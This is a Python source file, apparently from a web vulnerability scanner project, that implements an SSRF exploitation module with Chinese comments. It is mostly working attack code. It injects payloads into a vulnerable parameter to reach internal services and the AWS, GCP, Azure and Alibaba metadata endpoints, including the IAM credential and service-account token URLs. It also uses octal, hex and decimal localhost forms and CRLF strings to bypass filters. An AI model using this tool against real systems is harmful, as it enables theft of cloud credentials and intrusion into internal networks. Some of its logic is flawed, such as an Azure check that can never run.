Files
xss_scanner_mix/xss_scanner/exploits/ssrf_exploit.py

527 lines
22 KiB
Python
Raw Normal View History

2025-03-09 19:44:06 +08:00
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
SSRF服务器端请求伪造漏洞利用模块
"""
import logging
import re
import urllib.parse
import random
import string
import socket
import json
import ipaddress
logger = logging.getLogger('xss_scanner')
class SSRFExploit:
"""SSRF漏洞利用类"""
def __init__(self, http_client):
"""
初始化SSRF漏洞利用模块
Args:
http_client: HTTP客户端对象
"""
self.http_client = http_client
# 内部服务目标
self.internal_targets = [
"127.0.0.1", # 本地主机
"localhost", # 本地主机
"0.0.0.0", # 任意地址
"10.0.0.0/8", # 私有IP A类
"172.16.0.0/12", # 私有IP B类
"192.168.0.0/16", # 私有IP C类
"169.254.169.254", # AWS元数据服务
"metadata.google.internal", # GCP元数据
"100.100.100.200", # 阿里云元数据
"169.254.169.254", # Azure元数据
"127.0.0.1:25", # SMTP
"127.0.0.1:22", # SSH
"127.0.0.1:1433", # MS SQL
"127.0.0.1:3306", # MySQL
"127.0.0.1:5432", # PostgreSQL
"127.0.0.1:6379", # Redis
"127.0.0.1:9200", # Elasticsearch
"127.0.0.1:11211", # Memcached
"127.0.0.1:27017", # MongoDB
"127.0.0.1:8500", # Consul
"127.0.0.1:2375", # Docker API
"127.0.0.1:8080", # 常见Web服务
"127.0.0.1:8000", # 常见Web服务
"127.0.0.1:5000", # 常见Web服务
"127.0.0.1:3000" # 常见Web服务
]
# 内部服务路径
self.service_paths = {
"redis": ["/", ""],
"mysql": ["/", ""],
"elasticsearch": ["/", "/_cat/indices", "/_cluster/health"],
"mongodb": ["/", "/stats"],
"memcached": ["/", ""],
"docker": ["/", "/images/json", "/containers/json"],
"etcd": ["/", "/v2/keys", "/v2/members"],
"consul": ["/v1/catalog/services", "/v1/agent/self"],
"kubernetes": ["/api/v1/pods", "/api/v1/namespaces"]
}
# 云服务商元数据URL
self.cloud_metadata_urls = {
"aws": [
"http://169.254.169.254/latest/meta-data/",
"http://169.254.169.254/latest/meta-data/local-hostname",
"http://169.254.169.254/latest/meta-data/public-hostname",
"http://169.254.169.254/latest/meta-data/local-ipv4",
"http://169.254.169.254/latest/meta-data/public-ipv4",
"http://169.254.169.254/latest/meta-data/iam/security-credentials/"
],
"gcp": [
"http://metadata.google.internal/computeMetadata/v1/",
"http://metadata.google.internal/computeMetadata/v1/instance/hostname",
"http://metadata.google.internal/computeMetadata/v1/instance/id",
"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
],
"azure": [
"http://169.254.169.254/metadata/instance?api-version=2019-06-01",
"http://169.254.169.254/metadata/instance/compute?api-version=2019-06-01"
],
"alibaba": [
"http://100.100.100.200/latest/meta-data/",
"http://100.100.100.200/latest/meta-data/instance-id",
"http://100.100.100.200/latest/meta-data/region-id"
]
}
# IP替代表示法
self.ip_alternative_forms = {
"127.0.0.1": [
"localhost",
"127.0.1",
"127.1",
"2130706433", # 十进制表示
"0x7f000001", # 十六进制表示
"0177.0.0.01", # 八进制表示
"0177.0.0.1",
"0177.0.1",
"0177.1",
"::1", # IPv6表示
"::ffff:127.0.0.1", # IPv6 映射
"[::1]",
"[::ffff:127.0.0.1]",
"1278.1.1.1"
]
}
# SSRF绕过技术
self.ssrf_bypasses = [
"@", # URL认证绕过user:pass@host
"#", # URL片段
"?", # URL查询参数
"%23", # URL编码的#
"%3F", # URL编码的?
"\r\n", # CRLF注入
"%0D%0A", # URL编码的CRLF
"/.", # 目录遍历
"//" # 双斜杠
]
# 常见参数名
self.common_parameters = [
"url",
"uri",
"link",
"src",
"source",
"redirect",
"redirect_to",
"image",
"img",
"file",
"download",
"upload",
"domain",
"host",
"port",
"callback",
"return",
"return_to",
"next",
"target",
"feed",
"fetch",
"site",
"html",
"page",
"data",
"reference",
"reference_url"
]
def exploit(self, vulnerability):
"""
利用SSRF漏洞
Args:
vulnerability: 漏洞信息
Returns:
dict: 利用结果
"""
logger.info(f"尝试利用SSRF漏洞: {vulnerability['url']}")
url = vulnerability.get('url')
parameter = vulnerability.get('parameter')
payload = vulnerability.get('payload', '')
if not url or not parameter:
return {
'success': False,
'message': '缺少必要的漏洞信息(URL或参数名)',
'data': None
}
# 尝试探测内部服务
internal_services = []
successful_payloads = []
# 生成随机标记用于OAST带外应用安全测试
verification_id = ''.join(random.choice(string.ascii_lowercase) for _ in range(8))
oast_domain = f"ssrf-{verification_id}.example.com"
oast_url = f"http://{oast_domain}/"
logger.info(f"生成的OAST域名: {oast_domain}")
# 0. 首先尝试OAST探测如果有真实的回调服务器
if hasattr(self, 'callback_server') and self.callback_server:
logger.info("尝试使用OAST检测SSRF漏洞")
result = self._try_oast_detection(url, parameter, oast_url)
if result and result['success']:
return result
# 1. 尝试本地服务
logger.info("尝试探测本地服务")
for target in self.internal_targets[:5]: # 只尝试前5个目标
# 基本请求
result = self._try_internal_service(url, parameter, f"http://{target}")
if result and result['success']:
internal_services.append(result['data']['target'])
successful_payloads.append(result['data']['payload'])
logger.info(f"发现可访问的内部服务: {target}")
# 尝试一些端口如果目标是IP地址
if re.match(r"^\d+\.\d+\.\d+\.\d+$", target):
for port in [80, 8080, 8000, 5000, 3000, 22, 6379]:
result = self._try_internal_service(url, parameter, f"http://{target}:{port}")
if result and result['success']:
internal_services.append(f"{target}:{port}")
successful_payloads.append(result['data']['payload'])
logger.info(f"发现可访问的内部服务: {target}:{port}")
# 2. 尝试云服务商元数据
logger.info("尝试探测云服务商元数据")
cloud_metadata = {}
for provider, urls in self.cloud_metadata_urls.items():
for metadata_url in urls[:2]: # 只尝试前2个URL
result = self._try_internal_service(url, parameter, metadata_url)
if result and result['success']:
if provider not in cloud_metadata:
cloud_metadata[provider] = []
cloud_metadata[provider].append({
'url': metadata_url,
'response': result['data'].get('response', ''),
'payload': result['data']['payload']
})
successful_payloads.append(result['data']['payload'])
logger.info(f"发现可访问的云服务商元数据: {metadata_url}")
# 3. 尝试一些IP替代表示法绕过手段针对localhost
logger.info("尝试使用IP替代表示法绕过")
for alt_ip in self.ip_alternative_forms["127.0.0.1"][:5]: # 只尝试前5个替代表示
result = self._try_internal_service(url, parameter, f"http://{alt_ip}")
if result and result['success']:
internal_services.append(alt_ip)
successful_payloads.append(result['data']['payload'])
logger.info(f"通过IP替代表示法可访问本地服务: {alt_ip}")
# 编译结果
if internal_services or cloud_metadata:
logger.info(f"SSRF利用成功发现 {len(internal_services)} 个内部服务和 {len(cloud_metadata)} 个云服务商元数据")
# 选择一个最可靠的有效载荷作为PoC
poc_payload = successful_payloads[0] if successful_payloads else payload
# 构建 PoC URL
parsed_url = urllib.parse.urlparse(url)
query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
query_params[parameter] = poc_payload
new_query = urllib.parse.urlencode(query_params)
poc_url = urllib.parse.urlunparse((
parsed_url.scheme,
parsed_url.netloc,
parsed_url.path,
parsed_url.params,
new_query,
parsed_url.fragment
))
return {
'success': True,
'message': 'SSRF漏洞利用成功',
'data': {
'internal_services': internal_services,
'cloud_metadata': cloud_metadata,
'successful_payloads': successful_payloads
},
'poc': poc_url
}
else:
# 如果没有直接成功,返回手动验证步骤
logger.info("无法自动确认SSRF漏洞提供手动验证步骤")
return {
'success': False,
'message': '未能自动确认SSRF漏洞但可能存在请尝试手动验证',
'data': {
'parameter': parameter,
'url': url,
'oast_domain': oast_domain
},
'manual_steps': [
"1. 设置一个你控制的外部Web服务器记录所有接收到的请求",
f"2. 构造URL: {url}?{parameter}=http://your-server.com/ssrf-test",
"3. 如果你的服务器收到来自目标服务器的请求则确认存在SSRF漏洞",
"4. 尝试以下内部服务目标进行测试:",
" - http://localhost/",
" - http://127.0.0.1:8080/",
" - http://169.254.169.254/latest/meta-data/ (AWS元数据)",
"5. 尝试以下绕过技术:",
" - http://0177.0.0.1/ (八进制IP)",
" - http://0x7f000001/ (十六进制IP)",
" - http://2130706433/ (整数IP)"
]
}
def _try_internal_service(self, url, parameter, target_url):
"""
尝试通过SSRF访问内部服务
Args:
url: 目标URL
parameter: 参数名
target_url: 要访问的内部服务URL
Returns:
dict: 利用结果
"""
try:
logger.info(f"尝试访问内部服务: {target_url}")
# 构建SSRF测试URL
parsed_url = urllib.parse.urlparse(url)
query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
query_params[parameter] = target_url
# 重建查询字符串
new_query = urllib.parse.urlencode(query_params)
new_url = urllib.parse.urlunparse((
parsed_url.scheme,
parsed_url.netloc,
parsed_url.path,
parsed_url.params,
new_query,
parsed_url.fragment
))
# 发送请求
response = self.http_client.get(new_url)
# 检查响应查找SSRF成功的迹象
if response and response.status_code == 200:
response_text = response.text
# 检查常见的SSRF成功迹象
success_indicators = self._get_service_indicators(target_url)
for indicator in success_indicators:
if indicator in response_text:
logger.info(f"内部服务访问成功,找到特征: {indicator}")
return {
'success': True,
'message': f'成功利用SSRF漏洞访问内部服务: {target_url}',
'data': {
'target': target_url,
'parameter': parameter,
'payload': target_url,
'indicator': indicator,
'response': response_text[:200] + ('...' if len(response_text) > 200 else '')
}
}
# 如果没有找到明确的特征,检查是否有其他常见服务标识
if any(keyword in response_text.lower() for keyword in [
'apache', 'nginx', 'iis', 'server', 'service', 'redis', 'mysql',
'postgresql', 'mongodb', 'memcached', 'elasticsearch', 'forbidden', 'unauthorized',
'401', '403', 'authentication', 'password', 'login', 'admin', 'root', 'error',
'<title>', '<html>', 'json', 'xml', 'internal'
]):
logger.info(f"内部服务可能可以访问,发现常见服务标识")
return {
'success': True,
'message': f'可能成功利用SSRF漏洞访问内部服务: {target_url}',
'data': {
'target': target_url,
'parameter': parameter,
'payload': target_url,
'response': response_text[:200] + ('...' if len(response_text) > 200 else '')
}
}
# 如果HTTP状态码不是404可能成功了
if response.status_code not in [404, 400, 500]:
logger.info(f"内部服务响应了非错误状态码: {response.status_code}")
return {
'success': True,
'message': f'可能成功利用SSRF漏洞访问内部服务: {target_url}',
'data': {
'target': target_url,
'parameter': parameter,
'payload': target_url,
'status_code': response.status_code,
'response': response_text[:200] + ('...' if len(response_text) > 200 else '')
}
}
except Exception as e:
logger.error(f"尝试访问内部服务时出错: {str(e)}")
return None
def _try_oast_detection(self, url, parameter, callback_url):
"""
尝试使用OAST带外应用安全测试检测SSRF
Args:
url: 目标URL
parameter: 参数名
callback_url: 回调URL
Returns:
dict: 利用结果
"""
try:
logger.info(f"尝试OAST检测SSRF: {callback_url}")
# 构建SSRF测试URL
parsed_url = urllib.parse.urlparse(url)
query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
query_params[parameter] = callback_url
# 重建查询字符串
new_query = urllib.parse.urlencode(query_params)
new_url = urllib.parse.urlunparse((
parsed_url.scheme,
parsed_url.netloc,
parsed_url.path,
parsed_url.params,
new_query,
parsed_url.fragment
))
# 发送请求
response = self.http_client.get(new_url)
# 检查回调服务器是否收到请求(假设实现)
# 注意:这需要真实的回调服务器实现
if hasattr(self, 'check_callback') and self.check_callback(callback_url):
logger.info(f"检测到OAST回调确认SSRF漏洞")
return {
'success': True,
'message': '通过OAST成功确认SSRF漏洞',
'data': {
'callback_url': callback_url,
'parameter': parameter
},
'poc': new_url
}
except Exception as e:
logger.error(f"尝试OAST检测时出错: {str(e)}")
return None
def _get_service_indicators(self, target_url):
"""
获取目标服务的特征指标
Args:
target_url: 目标服务URL
Returns:
list: 特征指标列表
"""
indicators = []
# 提取主机和路径
try:
parsed_url = urllib.parse.urlparse(target_url)
host = parsed_url.netloc.split(':')[0]
path = parsed_url.path
# AWS元数据服务特征
if host == '169.254.169.254':
indicators = ['ami-id', 'instance-id', 'instance-type', 'local-hostname',
'local-ipv4', 'public-hostname', 'public-ipv4', 'security-credentials']
# GCP元数据服务特征
elif host == 'metadata.google.internal':
indicators = ['instance', 'attributes', 'service-accounts', 'project',
'hostname', 'image', 'machine-type']
# Azure元数据服务特征
elif host == '169.254.169.254' and 'metadata' in path:
indicators = ['vmId', 'compute', 'network', 'osType', 'location',
'resourceGroupName', 'apiVersion']
# 阿里云元数据服务特征
elif host == '100.100.100.200':
indicators = ['instance-id', 'region-id', 'zone-id', 'vpc-id',
'private-ipv4']
# Redis服务特征
elif host == '127.0.0.1' and '6379' in target_url:
indicators = ['redis_version', 'connected_clients', 'PONG', 'ERR',
'NOAUTH', 'AUTH']
# MySQL服务特征
elif host == '127.0.0.1' and '3306' in target_url:
indicators = ['mysql', 'SQL', 'MariaDB', 'syntax', 'Access denied',
'error', 'server version']
# Elasticsearch服务特征
elif host == '127.0.0.1' and ('9200' in target_url or 'elasticsearch' in target_url):
indicators = ['cluster_name', 'nodes', 'shards', 'indices', 'lucene_version',
'version', 'elasticsearch']
# MongoDB服务特征
elif host == '127.0.0.1' and '27017' in target_url:
indicators = ['mongodb', 'databases', 'collections', 'command',
'assertion', 'not authorized']
# Docker API特征
elif host == '127.0.0.1' and ('2375' in target_url or 'docker' in target_url):
indicators = ['containers', 'images', 'volumes', 'version',
'docker', 'Config', 'Id', 'Name']
# Web服务器标识
else:
indicators = ['apache', 'nginx', 'iis', 'server', 'web server', 'title',
'html', 'body', 'login', 'admin', 'index', 'welcome',
'404', '403', '401', '500', 'error', 'not found', 'forbidden']
except Exception as e:
logger.error(f"获取服务特征指标时出错: {str(e)}")
return indicators